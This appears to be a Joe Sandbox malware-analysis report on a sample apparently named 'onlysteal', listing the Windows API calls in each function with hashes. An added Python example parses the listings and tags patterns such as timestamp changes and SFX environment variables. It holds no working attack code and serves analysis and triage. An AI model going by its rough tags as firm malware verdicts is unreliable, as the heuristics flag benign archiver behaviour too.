                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: 9a61b4eabad21d089b33980c6eb908d1c954e87d2165c51ef565b55111cb26af
                                      • Instruction ID: bbacaa380fe48bd6339095d5c0809600d64ffd93f6840a3178ef90aa2f7ed890
                                      • Opcode Fuzzy Hash: 9a61b4eabad21d089b33980c6eb908d1c954e87d2165c51ef565b55111cb26af
                                      • Instruction Fuzzy Hash: 09F0ECB242423567DB241FD4DC4ABFA3B58AF16B81B040492FD8996051D6F089A0DAB0
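                                      The per-function API listings above are machine-generated and, read one block at a time, tell an analyst little; what a triage pass needs is each function as a structured call sequence that rules can run over. The Python below is an added example, not part of this Joe Sandbox report or of Joe Sandbox's own tooling: it parses `APIs` blocks in the exact text form shown on this page (call-site `ref:` addresses, `?` placeholders, `Part of subcall function` attributions) into per-function call lists and tags three patterns visible in the blocks above: CreateFileW followed by SetFileTime in one function, SetEnvironmentVariableW on `sfxcmd`/`sfxpar`, and a LoadLibrary of a literal DLL name. The sample input is copied from three blocks of this report; the tag names are mine, and the reading of `sfxcmd`/`sfxpar` as variables a WinRAR-style SFX stub exports to its payload is an assumption, not something the report states.

```python
"""Parse Joe Sandbox per-function 'APIs' listings into call sequences and tag
capability patterns.  Added example, not part of the report or of Joe Sandbox.
SAMPLE is copied from three blocks of the report; tag names and the SFX
interpretation of sfxcmd/sfxpar are the example author's assumptions."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample input: three 'APIs' blocks copied verbatim from the report above.
SAMPLE = """\
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00237760,?,00000005,?,00000011), ref: 0023995F
• GetLastError.KERNEL32(?,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0023996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00237760,?,00000005,?), ref: 002399A2
• GetLastError.KERNEL32(?,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002399AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00237760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002399F9
APIs
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0024DBF4
• SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0024DC30
APIs
  • Part of subcall function 0024081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
  • Part of subcall function 0024081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
• OleInitialize.OLE32(00000000), ref: 0024AC2F
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0024AC66
• SHGetMalloc.SHELL32(00278438), ref: 0024AC70
"""

# One listed call: "• Api.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:", and sometimes without an argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]                 # as printed: literals, '?' for unresolved, stack noise past the real params
    ref: str                        # call-site address
    subcall: Optional[str] = None   # callee address when the report attributes the call to a subcall


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)

    @property
    def direct(self) -> List[Call]:
        return [c for c in self.calls if c.subcall is None]

    @property
    def entry(self) -> Optional[str]:
        # The report does not print the function start; label it by its first direct call site.
        return self.direct[0].ref if self.direct else None


def parse_api_blocks(text: str) -> List[Function]:
    """Every 'APIs' heading starts a new function; all other report lines are ignored."""
    funcs: List[Function] = []
    cur: Optional[Function] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Function()
            funcs.append(cur)
            continue
        m = API_LINE.match(line)
        if m is None or cur is None:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        cur.calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return funcs


SFX_ENV = {"sfxcmd", "sfxpar"}   # assumption: variables a WinRAR-style SFX stub exports to its payload


def literal_dlls(fn: Function) -> List[str]:
    """Literal *.dll names passed in any of the function's calls, attributed subcalls included."""
    return sorted({a for c in fn.calls for a in c.args if a.lower().endswith(".dll")})


def tag_function(fn: Function) -> set:
    tags = set()
    direct_apis = {c.api for c in fn.direct}
    if {"CreateFileW", "SetFileTime"} <= direct_apis:
        # Opens a file and rewrites its timestamps: timestomping in a dropper, but also
        # what an archiver does to restore mtimes on extraction.  A hint, not a verdict.
        tags.add("sets-file-times")
    if any(c.api == "SetEnvironmentVariableW" and c.args and c.args[0] in SFX_ENV for c in fn.direct):
        tags.add("sfx-env")
    if any(c.api.startswith("LoadLibrary") for c in fn.calls) and literal_dlls(fn):
        tags.add("loads-named-dll")   # the report shows GetSystemDirectoryW beside it: check the load path is absolute
    return tags


def triage(text: str) -> dict:
    """Map each function (labelled by its first direct call site) to its sorted tags."""
    return {f.entry: sorted(tag_function(f)) for f in parse_api_blocks(text) if f.entry}


if __name__ == "__main__":
    for entry, tags in triage(SAMPLE).items():
        print(entry, ", ".join(tags) or "-")
```

                                      Only direct calls count for the `sets-file-times` and `sfx-env` tags, so a function is not tagged merely because something it calls is; the DLL-name rule deliberately includes attributed subcalls, because that is where the report places the `Crypt32.dll` load. Argument index 4 of CreateFileW in the first block is `00000003` (OPEN_EXISTING), which is why the `args` list is kept positionally as printed rather than collapsed to the literal values.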

                                      Control-flow Graph (graph image not extracted; summarised from the graph data): basic blocks 239785 through 239817; internal call to 2398bc and a recursive call to 239785 (the function's own start) from block 2397cd; API calls GetStdHandle, ReadFile and GetLastError (two call sites).
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00239795
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002397AD
                                      • GetLastError.KERNEL32 ref: 002397DF
                                      • GetLastError.KERNEL32 ref: 002397FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: b4cefbc7d8d7ac62ebb6ce1d6b50e67f3ea541e74fc1beebaeb5933999d2e9d5
                                      • Instruction ID: ef9cd97e826d5cf3dd179c3cd895244a669c3850bb55235082e750cd18b1b135
                                      • Opcode Fuzzy Hash: b4cefbc7d8d7ac62ebb6ce1d6b50e67f3ea541e74fc1beebaeb5933999d2e9d5
                                      • Instruction Fuzzy Hash: D6118EF0934205EBDF209F64D804A6A77A9FB83760F108A2AF416852D0D7F49EE4DF61
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0023D710,00000000,00000000,?,0025ACDB,0023D710,00000000,00000000,00000000,?,0025AED8,00000006,FlsSetValue), ref: 0025AD66
                                      • GetLastError.KERNEL32(?,0025ACDB,0023D710,00000000,00000000,00000000,?,0025AED8,00000006,FlsSetValue,00267970,FlsSetValue,00000000,00000364,?,002598B7), ref: 0025AD72
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0025ACDB,0023D710,00000000,00000000,00000000,?,0025AED8,00000006,FlsSetValue,00267970,FlsSetValue,00000000), ref: 0025AD80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: fe5ee8acfc5b292720c5802e63e930b09816d55fd075cfe1e9d27e009bea4ddd
                                      • Instruction ID: 09bb11ecf1609c011722178ef2d59cf84cf7060d287e4630b82d8bd914db6268
                                      • Opcode Fuzzy Hash: fe5ee8acfc5b292720c5802e63e930b09816d55fd075cfe1e9d27e009bea4ddd
                                      • Instruction Fuzzy Hash: AB012432222227ABC7219E68BC49A567B78EF04BA37114320FC06D3550C770CC2886E5
                                      APIs
                                        • Part of subcall function 002597E5: GetLastError.KERNEL32(?,00271030,00254674,00271030,?,?,00253F73,00000050,?,00271030,00000200), ref: 002597E9
                                        • Part of subcall function 002597E5: _free.LIBCMT ref: 0025981C
                                        • Part of subcall function 002597E5: SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 0025985D
                                        • Part of subcall function 002597E5: _abort.LIBCMT ref: 00259863
                                        • Part of subcall function 0025BB4E: _abort.LIBCMT ref: 0025BB80
                                        • Part of subcall function 0025BB4E: _free.LIBCMT ref: 0025BBB4
                                        • Part of subcall function 0025B7BB: GetOEMCP.KERNEL32(00000000,?,?,0025BA44,?), ref: 0025B7E6
                                      • _free.LIBCMT ref: 0025BA9F
                                      • _free.LIBCMT ref: 0025BAD5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID: p&
                                      • API String ID: 2991157371-4236815001
                                      • Opcode ID: f6fca61f18896f62ab565cb8906cee2c53d8788950255e15184e6d309843bedf
                                      • Instruction ID: 114471b49f0cb11b4b2a38bf926670874a74431f5e7e8c18d502fb62527d6e8b
                                      • Opcode Fuzzy Hash: f6fca61f18896f62ab565cb8906cee2c53d8788950255e15184e6d309843bedf
                                      • Instruction Fuzzy Hash: 34313B31910209AFDB12DFA8D445B9DB7F5EF44322F214099EC049B2A2EF725D68CF58
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($$2$
                                      • API String ID: 1269201914-440871062
                                      • Opcode ID: 6c68e562b7eecf70bf6e09f2b946bc27038725b5376659db506b5510d437a2ed
                                      • Instruction ID: 0c9135373ec184481b1d4b476210bbc9661ab9fd24fb4897e959c7f88ce23f42
                                      • Opcode Fuzzy Hash: 6c68e562b7eecf70bf6e09f2b946bc27038725b5376659db506b5510d437a2ed
                                      • Instruction Fuzzy Hash: E7B012C16780007D3E0CB2095C02D3B010DE4C2F10371402EF405C0080E8800C700932
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0023D343,00000001,?,?,?,00000000,0024551D,?,?,?), ref: 00239F9E
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0024551D,?,?,?,?,?,00244FC7,?), ref: 00239FE5
                                      • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0023D343,00000001,?,?), ref: 0023A011
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: 14b36b051541938205592651e7462e0db774626201d6885201441a6b57111f68
                                      • Instruction ID: 61e6174aa3790d22d61bdfc3c83ecb498893700c90bf8ce627cfb2a83551142f
                                      • Opcode Fuzzy Hash: 14b36b051541938205592651e7462e0db774626201d6885201441a6b57111f68
                                      • Instruction Fuzzy Hash: 0A31F9B1124306EFDB18CF24D818B6E77A5FF85710F00451DF88197290C7B59DA8CB92
                                      APIs
                                        • Part of subcall function 0023C27E: _wcslen.LIBCMT ref: 0023C284
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A2D9
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A30C
                                      • GetLastError.KERNEL32(?,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A329
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast_wcslen
                                      • String ID:
                                      • API String ID: 2260680371-0
                                      • Opcode ID: bcddbf65c01eac2b4d29e95bcf52623ddef9c8c3d7fe3b1c86474d84724376b2
                                      • Instruction ID: 503aa4138457fb48c7b061b09ef293842318be733ce6f5ddf5d1101f3c6bfa6d
                                      • Opcode Fuzzy Hash: bcddbf65c01eac2b4d29e95bcf52623ddef9c8c3d7fe3b1c86474d84724376b2
                                      • Instruction Fuzzy Hash: E101FCB16302516AEF21AF759C49FFE3348AF09780F044475FD81E6081D764CAA1CAB3
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0025B8B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: 7f9554c9b0d3b542c6d80e710160ca268c389a8ea96aac34096e62b6f5c9cbcb
                                      • Instruction ID: 07ddb3351581c6827bd30316fdca19afb98a59658211ce7adb70991095025580
                                      • Opcode Fuzzy Hash: 7f9554c9b0d3b542c6d80e710160ca268c389a8ea96aac34096e62b6f5c9cbcb
                                      • Instruction Fuzzy Hash: 9B41177051438C9EDF238E28CC84BF6BBADEB55305F1404ECE99A86142D375AA69CF64
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0025AFDD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: 9b6a73cde88b7f426e7d098fc717931f91ee8def62c265c95af1229be2c6a867
                                      • Instruction ID: 1e24fba14c8ffbba38a78e2719ab5cae1f70ba86f640c3fd34716407e6b416bb
                                      • Opcode Fuzzy Hash: 9b6a73cde88b7f426e7d098fc717931f91ee8def62c265c95af1229be2c6a867
                                      • Instruction Fuzzy Hash: 8801E532515209FBCF029F90EC06DEE7FA2EF09755F018255FE1466160CA728A71AF95
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0025A56F), ref: 0025AF55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: e1a6d23addad960a6e15e34662763654132c4f0a295aa0e450ba7adc381ae2c1
                                      • Instruction ID: ef7c2a1befcc7627e97b91ca8f3753ee9a3aad29dc3b45f62c80993c52403ca4
                                      • Opcode Fuzzy Hash: e1a6d23addad960a6e15e34662763654132c4f0a295aa0e450ba7adc381ae2c1
                                      • Instruction Fuzzy Hash: EBF0E931656208BFCF169F54EC06D9DBFA1EF09712B008155FC089A260DA725E309B89
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: e58da691790b6f0f9c3dfa7e5e04c3954371f535ae7f8355061609db080dea06
                                      • Instruction ID: 3b96a54e8a6628c6ecd5b159673069ca724dd7eacba08d2ec42feed4d64c1a7c
                                      • Opcode Fuzzy Hash: e58da691790b6f0f9c3dfa7e5e04c3954371f535ae7f8355061609db080dea06
                                      • Instruction Fuzzy Hash: 77E02B316662187BC705EB65FC07D6EBBE4DB56722B0142A9FC0597240CDB05E6086DA
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: e9c9fd24133908910466c90565b1d53b0e78f996b3e834e96ae950a22a3f9234
                                      • Instruction ID: 5ac866153a2d4092967086aab7128226faf42ddb670ff4697a25a3d39577485d
                                      • Opcode Fuzzy Hash: e9c9fd24133908910466c90565b1d53b0e78f996b3e834e96ae950a22a3f9234
                                      • Instruction Fuzzy Hash: A5B012D52BC100AC3E4CB1491C42C3B010DE0C5B10331403EF80EC00A0D8807C700A71
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 7aff6cfe3d016c4feeda1d536cec966df07cd1c37ef887d3949c9e9937e8a309
                                      • Instruction ID: 884a873827e19646fb88b5675ec88715823f7291547d7df9fc42e349471ff218
                                      • Opcode Fuzzy Hash: 7aff6cfe3d016c4feeda1d536cec966df07cd1c37ef887d3949c9e9937e8a309
                                      • Instruction Fuzzy Hash: 1CB012D62B8000AC3E4CB2051C02C3B010DD0C6B10331C03EFC0EC0190D880BC740971
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: e69cfa00bf380068fa458eceaed2a409204bd0ad9310a4d2cd4416e9ceb738a5
                                      • Instruction ID: 51f461696a184eea2ff7feabc225f53e3bebbedfb420160b0737d7cddd29e06d
                                      • Opcode Fuzzy Hash: e69cfa00bf380068fa458eceaed2a409204bd0ad9310a4d2cd4416e9ceb738a5
                                      • Instruction Fuzzy Hash: 13B012D92B8100BC3E0C71451C42C3B010DD0C6B10331843EFC0ED0490D880BC700871
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                       • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
